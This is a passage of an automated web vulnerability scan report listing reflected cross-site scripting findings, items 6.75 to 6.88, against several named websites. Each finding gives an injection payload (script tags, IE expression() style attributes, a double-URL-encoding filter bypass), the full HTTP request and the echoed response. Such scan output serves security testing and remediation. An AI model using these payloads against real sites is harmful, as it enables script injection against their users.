Date: Tue, 03 May 2011 15:43:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5381
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 35245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/app63b87";ca31f7e83db/weather/qwikcast_feed0.xml"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           
...[SNIP]...

6.75. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b was submitted in the REST URL parameter 1. This input was echoed as cc9ae"style="x:expression(alert(1))"24a7f090c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /appcc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682812
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:43:41 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3848
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 35303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appcc9ae"style="x:expression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml">
...[SNIP]...

6.76. http://www.maysville-online.com/content/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6350"style%3d"x%3aexpression(alert(1))"afd7046f106 was submitted in the REST URL parameter 1. This input was echoed as e6350"style="x:expression(alert(1))"afd7046f106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /contente6350"style%3d"x%3aexpression(alert(1))"afd7046f106/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4789316
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9828
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/contente6350"style="x:expression(alert(1))"afd7046f106/">
...[SNIP]...

6.77. http://www.maysville-online.com/content/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f5b"%3b5974e76950d was submitted in the REST URL parameter 1. This input was echoed as 82f5b";5974e76950d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content82f5b"%3b5974e76950d/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4680120
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:59 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9631
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 35267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content82f5b";5974e76950d/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""
   
...[SNIP]...

6.78. http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a2e"-alert(1)-"f8cf8d87874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/?c3a2e"-alert(1)-"f8cf8d87874=1 HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4640076
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3075
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 35227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content/?c3a2e"-alert(1)-"f8cf8d87874=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.79. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 was submitted in the REST URL parameter 1. This input was echoed as e1e70"style="x:expression(alert(1))"7a060a3ea66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4690004
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2412
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 35060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/e1e70"style="x:expression(alert(1))"7a060a3ea66/">
...[SNIP]...

6.80. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e48b"%3b5ee898a3ded was submitted in the REST URL parameter 1. This input was echoed as 1e48b";5ee898a3ded in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1e48b"%3b5ee898a3ded HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4689680
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2417
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 34873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/1e48b";5ee898a3ded/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""
   
...[SNIP]...

6.81. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4e4"-alert(1)-"ccebc516c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?be4e4"-alert(1)-"ccebc516c28=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4649020
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2061
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp5
Content-Length: 34970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/favicon.ico?be4e4"-alert(1)-"ccebc516c28=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.82. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naturalhealers.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0286<script>alert(1)</script>41cb61d962e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod0286<script>alert(1)</script>41cb61d962e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:30 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=a196283b02e135e7192e777c542f696e; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
Set-Cookie: info=75PfvcdfpL%252F0UPFxG06mOIitKllf7bSZghWOoeIb7CPzxLzS5LrFnQgpRhpWi%252BpFQnKrpaem5gEfIujJQGecvMIoZQ7RA7aRRDHlwebwhxlGHk9OcWkBnHgmcmlRumjPj%252B5qAvzVHhh%252Bi5bVukHcYzHN4y6vo0mnTyfDHbHilotcrXSVm7VvjjzTy1Yk5p90; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjAwO30%253D; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<h3>Sorry, the page 'favicon.icod0286<script>alert(1)</script>41cb61d962e' was not found.</h3>
...[SNIP]...

6.83. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naturalhealers.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4548a"><script>alert(1)</script>59dfafabf4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4548a"><script>alert(1)</script>59dfafabf4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:29 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=27faac9e321bfea0669b23eafeee200c; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
Set-Cookie: info=75PfvcdfpL%252BLhbseSbe%252FXg3lSY0z3e6UOqyk47lmxL74FP7ujUOawM9vS4nN7p%252FxfPD7ImrWMkdh8HVIIeZlndLiVyafXt4IvqHgOuADGACeooJ%252BGImZAaLYU7ZnuzbCqbAd1LAml2aKTR5%252F8DoxIhooreGxpgbd2BJ4tNdIfArHZAhos008REY%252FIneiuUbV; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjA0O30%253D; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input onclick="open_subscribe_window('em_footer_widget','anh:favicon.ico4548a"><script>alert(1)</script>59dfafabf4d')" type="image" src="/img/subscriber/email_subscribe_btn.png" />
...[SNIP]...

6.84. http://www.ntra.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ntra.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d785d'-alert(1)-'27403f71a0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod785d'-alert(1)-'27403f71a0a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:23:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.0
Expires: Tue, 03 May 2011 11:28:04 GMT
Cache-control:
Pragma:
Content-Length: 56452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
uContainer1").toggle();
    //$("#subMenuContainer1").slideUp("slow");
    // $('#subMenuContainer').html(data.output);
            //$("#subMenuContainer1").slideDown("slow");
}
var requequestURL = '/favicon.icod785d'-alert(1)-'27403f71a0a';
var urlFound=0;
$(document).ready(function(){
$('a[rev=NTRAMENU]').each(function() {
       if($(this).attr('href')==requequestURL){
               changeImage($(this).attr('parentId'));
               urlFound=1;
               return
...[SNIP]...

6.85. http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ontargetpayday.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae710"><script>alert(1)</script>d9f5089b7b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico?ae710"><script>alert(1)</script>d9f5089b7b4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ontargetpayday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:58 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_ssl/2.2.3 OpenSSL/0.9.8c
Set-Cookie: JSESSIONID=202343562D543C98EE85C48CFDA9FCB4; Path=/i
Content-Length: 301
Content-Type: text/html;charset=UTF-8


<html>
<head><title>www.ontargetpayday.com Home Page</title></head>
   <frameset rows="100%,*" border="0">
   <frame src="welcome.do?&ae710"><script>alert(1)</script>d9f5089b7b4=1&pid=1081&sid=SITE_APPLY_NOW" frameborder="0">
...[SNIP]...

6.86. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.osbornewood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a3a"><script>alert(1)</script>8f0a1a4c44b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=349be7e19eac4cbc0b7aef57a8834603; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19261

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <HTML>
   <head>
   <meta name="robots" content="noindex,follow">
   <ti
...[SNIP]...
<a href="javascript:bookmarksite('http://www.osbornewood.com', 'http://www.osbornewood.com/favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b')">
...[SNIP]...

6.87. http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsideinfo.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97c1b<script>alert(1)</script>7564d18a5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsideinfo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:45:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 315
Content-Type: text/html
Set-Cookie: hotvisitor=resp%5Fid=0&visitor%5Fid=%7B181737FE%2DE1B4%2D408E%2DA42A%2DCFF09AE4D61A%7D; expires=Wed, 01-Jan-2025 05:00:00 GMT; path=/
Set-Cookie: hotsession=cover%5Fimage%5Ftag=&issue%5Fdate=2011%2D05%2D01&pretty%5Fissue%5Fdate=May+2011&issue%5Fid=37768&survey%5Fset%5Fid=0&preview%5Fmode=False&eresponse=False&card%5Fsurvey%5Fset%5Fid=0&resp%5Fauthenticated=False&session%5Fid=%7B1301BBA9%2D579C%2D404E%2D8D21%2D0D2E02504486%7D; path=/
Set-Cookie: ASPSESSIONIDCSTDBDDB=FJGJHNNDGPODKCFEDJMOOGBI; path=/
Cache-control: private


   <html>
   <head>
   <title>404 Not Found</title>
   </head>
   <body bgcolor="White">
   <h1>404 Not Found</h1>
   <p> http://www.outsideinfo.com/favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1    </p>
...[SNIP]...

6.88. http://www.pordeo.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pordeo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 was submitted in the REST URL parameter 1. This input was echoed as 94c4b<script>alert(1)</script>94ee537d775 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 HTTP/1.1
